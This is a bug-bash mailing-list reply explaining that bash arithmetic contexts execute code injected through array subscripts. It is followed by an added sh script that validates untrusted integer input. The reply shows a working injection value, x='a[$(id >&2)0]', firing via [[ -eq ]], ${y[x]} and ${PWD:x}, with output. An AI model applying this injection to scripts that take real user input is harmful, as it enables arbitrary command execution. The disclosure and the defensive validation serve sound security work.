bug-bash
From: Greg Wooledge
Subject: Re: BUG in arithcomp: bypass of the check condition and arbitrary read/write of shell variables
Date: Fri, 10 Apr 2020 10:47:16 -0400
User-agent: Mutt/1.10.1 (2018-07-13)

On Fri, Apr 10, 2020 at 09:44:31AM +0000, Raffaele Florio via Bug reports for 
the GNU Bourne Again SHell wrote:
> Indeed the functions called by arithcomp cause the evaluation of the supplied 
> arithcomp function argument, potentially fed by user input.

> Give in input "x=42,xyz=UID" to the below script. After the test x will 
> contain 42 and xyz the UID value. The same logic applies in this bug. Furthermore if 
> PWD is given, instead of UID, the PWD value is printed thanks to the evaluation 
> error.

Yeah, this is a "well known feature".  Arithmetic expansions of all kinds
in bash are susceptible to arbitrary code execution, if any part of
the arithmetic expansion is fed by unsafe input.

This applies to every single place an arithmetic context can appear,
including the let and (( commands, the $(( expansion, the -eq operator
of the [[ command, indexed array indices, and the numeric parts of
the ${variable:start:length} expansion.  And possibly more.

unicorn:~$ x='a[$(id >&2)0]' a=7
unicorn:~$ [[ "$x" -eq 42 ]]
uid=1000(greg) gid=1000(greg) groups=1000(greg),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
unicorn:~$ echo "${y[x]}"
uid=1000(greg) gid=1000(greg) groups=1000(greg),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)

unicorn:~$ echo "${PWD:x}"
uid=1000(greg) gid=1000(greg) groups=1000(greg),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
reg
unicorn:~$ 

To the best of my knowledge, this is not considered a bug in bash,
but rather a bug in your script, if you fail to sanitize user input
before passing it to an arithmetic context.
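As an added example, not part of Greg's reply and not bash's own code: a portable sh validation function that rejects anything other than an optionally negative decimal integer before the value can reach an arithmetic context, plus the "is it 42?" check from the original report rewritten on top of it. The function names (is_int, compare_to_42) and the sample inputs are made up for this illustration.

```shell
#!/bin/sh
# Added example, not from the bug-bash thread: validate untrusted input
# before it can reach any bash arithmetic context. Function names are
# invented here.

# is_int: succeed only if $1 is an optionally negative decimal integer.
# Any other string (array subscripts, $(...), bare variable names such as
# UID or PWD, "x=42,xyz=UID") is rejected, so nothing is ever evaluated
# by (( )), $(( )), [[ -eq ]], array indices or ${var:start:length}.
is_int() {
    case ${1#-} in
        ''|*[!0-9]*) return 1 ;;   # empty, a lone "-", or any non-digit
    esac
    return 0
}

# compare_to_42: the "is it 42?" check from the report, done safely.
# Exit status: 0 = equal, 1 = valid integer but not 42, 2 = input rejected.
# Single-bracket test is used deliberately: unlike [[ ]], it does not
# arithmetic-expand its operands and only accepts integer literals.
compare_to_42() {
    is_int "$1" || return 2
    [ "$1" -eq 42 ]
}

# Demo over constructed inputs. The last three are the shapes used in the
# thread; they are rejected before any evaluation could happen.
for input in 42 -7 007 41 'a[0]' 'x=42,xyz=UID' UID ''; do
    rc=0
    compare_to_42 "$input" || rc=$?
    case $rc in
        0) printf '%-16s -> equal to 42\n' "'$input'" ;;
        2) printf '%-16s -> rejected, not an integer\n' "'$input'" ;;
        *) printf '%-16s -> integer, not 42\n' "'$input'" ;;
    esac
done
```

The point of the check is that the only strings allowed through are ones the arithmetic parser can do nothing with except read as a number; a leading-zero value such as 007 still passes, so if octal interpretation matters to your script, strip or reject leading zeros as well.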